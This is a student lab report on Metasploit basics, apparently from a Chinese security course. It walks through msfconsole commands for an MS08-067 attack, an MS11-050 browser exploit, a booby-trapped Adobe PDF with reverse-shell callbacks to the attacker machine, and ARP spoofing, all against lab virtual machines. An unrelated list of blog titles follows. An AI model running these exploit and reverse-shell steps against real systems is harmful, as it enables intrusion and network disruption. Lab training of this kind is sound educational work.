20165229 Exp5 MSF基础应用
20165229 Exp5 MSF基础应用
一、基础问题回答
解释exploit,payload,encode是什么:
- exploit:就是一个简单的攻击指令,在配置完成之后下发攻击命令。
- payload:是攻击载荷,是我们在攻击过程中真正用到的部分,进行攻击的实体。
- encode:是重新进行编码,伪装此次攻击,躲过查杀。
二、漏洞选择
1.主动攻击实践--ms08_067+generic/shell_reverse_tcp(成功!)
2.一个针对浏览器的攻击--ms11_050+windows/browser/ms11_050_mshtml_cobjectelement(成功!)
3.一个针对客户端的攻击-Adobe+generic/shell_reverse_tcp(成功!)
4.成功应用任何一个辅助模块--spoof arp+spoof/arp/arp_poisoning(成功&唯一!)
三、实验过程记录
(一)主动攻击实践--ms08_067
攻击机kali:192.168.43.234
靶机winXP:192.168.43.111
payload:generic/shell_reverse_tcp
- 实验前检查两个虚拟机能否互ping通
在Kali中打开mfs,输入指令
msfconsole
进入控制台输入
use exploit/windows/smb/ms08_067_netapi
指令进行主动攻击show payloads
显示可用载荷
set payload generic/shell_reverse_tcp
选择载荷show options
显示配置信息set RHOSTS 192.168.43.111
设置靶机xp IPset LHOST 192.168.43.234
设置攻击机kali IPexploit
开始攻击
(二)一个针对浏览器的攻击--ms11_050
攻击机kali:192.168.43.234
靶机win7:192.168.43.76
payload:windows/browser/ms11_050_mshtml_cobjectelement
- 实验前检查两个虚拟机能否互ping通
在Kali中打开mfs,输入指令
msfconsole
进入控制台输入
search ms11_050
查找漏洞输入
use exploit/windows/browser/ms11_050_mshtml_cobjectelement
选择漏洞show payloads
显示可用载荷
set payload windows/meterpreter/reverse_tcp
选择载荷show payloads
set LHOST 192.168.43.234
设置攻击机kali IPset RHOST 192.168.43.76
设置靶机win7 IPexploit
开始攻击
- win7下打开IE浏览器,输入上图网址
http://192.168.43.234:8080/F9nYjt
,如下图所示攻击成功,kali同时自动回连
(三)一个针对客户端的攻击-Adobe
攻击机kali:192.168.43.234
靶机win7:192.168.43.76
payload:generic/shell_reverse_tcp
在Kali中打开mfs,输入指令
msfconsole
进入控制台search adobe
查找漏洞
输入
use windows/fileformat/adobe_cooltype_sing
选择漏洞show payloads
显示可用载荷
set payload generic/shell_reverse_tcp
选择载荷set LHOST 192.168.43.234
设置攻击机kali IPset FILENAME 5229msf.pdf
设置生成的pdf文件名exploit
开始攻击
- 把上图所示的文件夹中的5229msf.pdf文件复制到u盘里,再拖到win7中
cp /root/.msf4/local/5229msf.pdf zkj420
- 回到kali,
back
退出当前模块,use exploit/multi/handler
进入监听模块,set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.43.234
设置kali IP
exploit
开始监听
- win7中用Adobe9.0打开pdf文件,kali回连成功
(四)成功应用任何一个辅助模块--spoof arp
攻击机kali:192.168.43.234
靶机win7:192.168.43.76
漏洞:spoof/arp/arp_poisoning
在Kali中打开mfs,输入指令
msfconsole
进入控制台输入
show auxiliary
,选择spoof/arp/arp_poisoning
漏洞
新开一个终端,
fping -g 192.168.43.234/24
查看哪些主机也在局域网中输入
arpspoof -h
查看命令使用方法输入
arpspoof -i eth0 -t 192.168.43.76(win7 IP) 192.168.43.1(在此局域网中的另一主机IP)
进行ARP攻击
- win7中浏览器无法访问任何网页,攻击成功
- 回到kali,按command+C停止攻击,win7 IE浏览器可以正常访问网页
- Day5上午解题报告
- [编程经验] Pandas中比较好用的几个方法
- [编程经验] Elasticsearch 初识
- 2017.10.26水题大作战部分题解
- 2017.10.27涩会题大乱斗部分题解
- 【 关关的刷题日记50】 Leetcode 345. Reverse Vowels of a String
- Day1上午解题报告
- 【 关关的刷题日记51】 Leetcode 67. Add Binary
- 【 关关的刷题日记53】 Leetcode 100. Same Tree
- Day1下午解题报告
- 【关关的刷题日记54】Leetcode 226. Invert Binary Tree
- Day2上午解题报告
- 【关关的刷题日记55】Leetcode 404. Sum of Left Leaves
- CSS选择器详解
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- c语言之条件编译
- python之使用魔术方法__getitem__和__len__
- B+Tree index structures in InnoDB(7.InnoDB中B+树的索引结构)
- Java基础
- 广度优先遍历--选课的智慧
- paddlepaddle目标检测之水果检测(yolov3_mobilenet_v1)
- 【每日一题】41. First Missing Positive
- springmvc之第一个springmvc程序
- python小例子(一)
- springmvc之RequestMapping注解既可以修饰类也可以修饰方法
- hadoop伪分布式之配置历史服务器
- 广度优先遍历--合法的括号
- hadoop伪分布式之配置日志聚集
- Kettle构建Hadoop ETL实践(二):安装与配置
- WKWebView加载沙盒HTML